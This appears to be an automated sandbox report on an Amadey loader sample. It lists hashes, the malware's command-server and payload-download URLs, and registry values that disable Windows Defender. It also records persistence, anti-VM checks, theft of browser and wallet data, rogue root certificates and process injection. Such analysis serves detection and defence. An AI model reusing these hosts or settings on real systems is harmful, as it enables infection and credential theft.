Analysis
-
max time kernel
149s -
max time network
154s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
07-02-2025 15:13
Static task
static1
Behavioral task
behavioral1
Sample
random.exe
Resource
win7-20240903-en
General
-
Target
random.exe
-
Size
938KB
-
MD5
82770f4f16aafa62bf019d0e2944023c
-
SHA1
1a5de9e7ff040d5826f667772b968c3fef511a1d
-
SHA256
3102530afdedd09fe1f4900a923940a685f225a9b403c82b5ad6ef7387645a58
-
SHA512
cbeea51108249e8450ad07a24797b1fc37ddb9cabd44995560dec23c7827b5a77e6e84cc0a870ed41667ffafdcd6750c32fe92b217527c2f98e46990fd0f8667
-
SSDEEP
24576:8qDEvCTbMWu7rQYlBQcBiT6rprG8ay8F:8TvC/MTQYxsWR7ay8
Malware Config
Extracted
http://185.215.113.16/mine/random.exe
Extracted
http://185.215.113.16/defend/random.exe
Extracted
http://185.215.113.16/mine/random.exe
Extracted
amadey
4.42
9c9aa5
http://185.215.113.43
-
install_dir
abc3bc1985
-
install_file
skotes.exe
-
strings_key
8a35cf2ea38c2817dba29a4b5b25dcf0
-
url_paths
/Zu7JuNko/index.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2368-167-0x0000000000F00000-0x00000000011B6000-memory.dmp healer behavioral1/memory/2368-168-0x0000000000F00000-0x00000000011B6000-memory.dmp healer behavioral1/memory/2368-277-0x0000000000F00000-0x00000000011B6000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ skotes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ aa18cc5449.exe -
Blocklisted process makes network request 3 IoCs
flow pid Process 4 3008 powershell.exe 10 3068 powershell.exe 11 640 powershell.exe -
pid Process 2560 powershell.exe 1800 powershell.exe 1600 powershell.exe 3068 powershell.exe 640 powershell.exe 3008 powershell.exe -
Downloads MZ/PE file 8 IoCs
flow pid Process 8 1244 skotes.exe 8 1244 skotes.exe 8 1244 skotes.exe 9 1244 skotes.exe 4 3008 powershell.exe 7 1244 skotes.exe 10 3068 powershell.exe 11 640 powershell.exe -
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion skotes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion aa18cc5449.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion aa18cc5449.exe -
Executes dropped EXE 11 IoCs
pid Process 2336 TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE 1244 skotes.exe 3036 tP5086S.exe 3048 tP5086S.exe 1596 f6ab01a3eb.exe 1220 Process not Found 2368 TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE 2220 uniq.exe 1952 uniq.exe 1532 483d2fa8a0d53818306efeb32d3.exe 1716 aa18cc5449.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine aa18cc5449.exe Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Wine skotes.exe -
Loads dropped DLL 21 IoCs
pid Process 3008 powershell.exe 3008 powershell.exe 2336 TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE 2336 TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE 1244 skotes.exe 3036 tP5086S.exe 3048 tP5086S.exe 1244 skotes.exe 3068 powershell.exe 3068 powershell.exe 1244 skotes.exe 2220 uniq.exe 888 WerFault.exe 888 WerFault.exe 888 WerFault.exe 888 WerFault.exe 888 WerFault.exe 640 powershell.exe 640 powershell.exe 1244 skotes.exe 1244 skotes.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\f6ab01a3eb.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1069896101\\f6ab01a3eb.exe" skotes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1069897021\\am_no.cmd" skotes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000500000001a4c2-96.dat autoit_exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 2336 TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE 1244 skotes.exe 2368 TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE 1532 483d2fa8a0d53818306efeb32d3.exe 1716 aa18cc5449.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2220 set thread context of 1952 2220 uniq.exe 67 -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\skotes.job TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE -
Detects Pyinstaller 2 IoCs
resource yara_rule behavioral1/files/0x0005000000019513-42.dat pyinstaller behavioral1/files/0x0005000000019642-57.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 888 2220 WerFault.exe 66 -
System Location Discovery: System Language Discovery 1 TTPs 28 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aa18cc5449.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f6ab01a3eb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language skotes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uniq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language random.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uniq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2704 timeout.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies system certificate store 2 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 uniq.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e uniq.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e uniq.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e uniq.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2264 schtasks.exe 2316 schtasks.exe 1568 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 23 IoCs
pid Process 3008 powershell.exe 3008 powershell.exe 3008 powershell.exe 2336 TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE 1244 skotes.exe 3068 powershell.exe 2560 powershell.exe 1800 powershell.exe 1600 powershell.exe 3068 powershell.exe 3068 powershell.exe 640 powershell.exe 2368 TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE 2368 TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE 2368 TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE 640 powershell.exe 640 powershell.exe 1952 uniq.exe 1952 uniq.exe 1952 uniq.exe 1952 uniq.exe 1532 483d2fa8a0d53818306efeb32d3.exe 1716 aa18cc5449.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 3008 powershell.exe Token: SeDebugPrivilege 3068 powershell.exe Token: SeDebugPrivilege 2560 powershell.exe Token: SeDebugPrivilege 1800 powershell.exe Token: SeDebugPrivilege 1600 powershell.exe Token: SeDebugPrivilege 640 powershell.exe Token: SeDebugPrivilege 2368 TempCFW4QF6ENU2PL91EKUJZLGKR3QLVHYPT.EXE -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 2612 random.exe 2612 random.exe 2612 random.exe 2336 TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE 1596 f6ab01a3eb.exe 1596 f6ab01a3eb.exe 1596 f6ab01a3eb.exe -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 2612 random.exe 2612 random.exe 2612 random.exe 1596 f6ab01a3eb.exe 1596 f6ab01a3eb.exe 1596 f6ab01a3eb.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2612 wrote to memory of 1160 2612 random.exe 31 PID 2612 wrote to memory of 1160 2612 random.exe 31 PID 2612 wrote to memory of 1160 2612 random.exe 31 PID 2612 wrote to memory of 1160 2612 random.exe 31 PID 2612 wrote to memory of 2904 2612 random.exe 32 PID 2612 wrote to memory of 2904 2612 random.exe 32 PID 2612 wrote to memory of 2904 2612 random.exe 32 PID 2612 wrote to memory of 2904 2612 random.exe 32 PID 1160 wrote to memory of 2264 1160 cmd.exe 34 PID 1160 wrote to memory of 2264 1160 cmd.exe 34 PID 1160 wrote to memory of 2264 1160 cmd.exe 34 PID 1160 wrote to memory of 2264 1160 cmd.exe 34 PID 2904 wrote to memory of 3008 2904 mshta.exe 35 PID 2904 wrote to memory of 3008 2904 mshta.exe 35 PID 2904 wrote to memory of 3008 2904 mshta.exe 35 PID 2904 wrote to memory of 3008 2904 mshta.exe 35 PID 3008 wrote to memory of 2336 3008 powershell.exe 37 PID 3008 wrote to memory of 2336 3008 powershell.exe 37 PID 3008 wrote to memory of 2336 3008 powershell.exe 37 PID 3008 wrote to memory of 2336 3008 powershell.exe 37 PID 2336 wrote to memory of 1244 2336 TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE 38 PID 2336 wrote to memory of 1244 2336 TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE 38 PID 2336 wrote to memory of 1244 2336 TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE 38 PID 2336 wrote to memory of 1244 2336 TempBNGAMKJCNIPEIJTDIPVHVWPM6JQ2P5R5.EXE 38 PID 1244 wrote to memory of 3036 1244 skotes.exe 41 PID 1244 wrote to memory of 3036 1244 skotes.exe 41 PID 1244 wrote to memory of 3036 1244 skotes.exe 41 PID 1244 wrote to memory of 3036 1244 skotes.exe 41 PID 3036 wrote to memory of 3048 3036 tP5086S.exe 42 PID 3036 wrote to memory of 3048 3036 tP5086S.exe 42 PID 3036 wrote to memory of 3048 3036 tP5086S.exe 42 PID 1244 wrote to memory of 1596 1244 skotes.exe 43 PID 1244 wrote to memory of 1596 1244 skotes.exe 43 PID 1244 wrote to memory of 1596 1244 skotes.exe 43 PID 1244 wrote to memory of 1596 1244 skotes.exe 43 PID 1596 wrote to memory of 2712 1596 f6ab01a3eb.exe 44 PID 1596 wrote to memory of 2712 1596 f6ab01a3eb.exe 44 PID 1596 wrote to memory of 2712 1596 f6ab01a3eb.exe 44 PID 1596 wrote to memory of 2712 1596 f6ab01a3eb.exe 44 PID 1596 wrote to memory of 1508 1596 f6ab01a3eb.exe 45 PID 1596 wrote to memory of 1508 1596 f6ab01a3eb.exe 45 PID 1596 wrote to memory of 1508 1596 f6ab01a3eb.exe 45 PID 1596 wrote to memory of 1508 1596 f6ab01a3eb.exe 45 PID 2712 wrote to memory of 2316 2712 cmd.exe 47 PID 2712 wrote to memory of 2316 2712 cmd.exe 47 PID 2712 wrote to memory of 2316 2712 cmd.exe 47 PID 2712 wrote to memory of 2316 2712 cmd.exe 47 PID 1508 wrote to memory of 3068 1508 mshta.exe 48 PID 1508 wrote to memory of 3068 1508 mshta.exe 48 PID 1508 wrote to memory of 3068 1508 mshta.exe 48 PID 1508 wrote to memory of 3068 1508 mshta.exe 48 PID 1244 wrote to memory of 1944 1244 skotes.exe 50 PID 1244 wrote to memory of 1944 1244 skotes.exe 50 PID 1244 wrote to memory of 1944 1244 skotes.exe 50 PID 1244 wrote to memory of 1944 1244 skotes.exe 50 PID 1944 wrote to memory of 2576 1944 cmd.exe 52 PID 1944 wrote to memory of 2576 1944 cmd.exe 52 PID 1944 wrote to memory of 2576 1944 cmd.exe 52 PID 1944 wrote to memory of 2576 1944 cmd.exe 52 PID 2576 wrote to memory of 2704 2576 cmd.exe 54 PID 2576 wrote to memory of 2704 2576 cmd.exe 54 PID 2576 wrote to memory of 2704 2576 cmd.exe 54 PID 2576 wrote to memory of 2704 2576 cmd.exe 54 PID 2576 wrote to memory of 2544 2576 cmd.exe 55
Processes
-
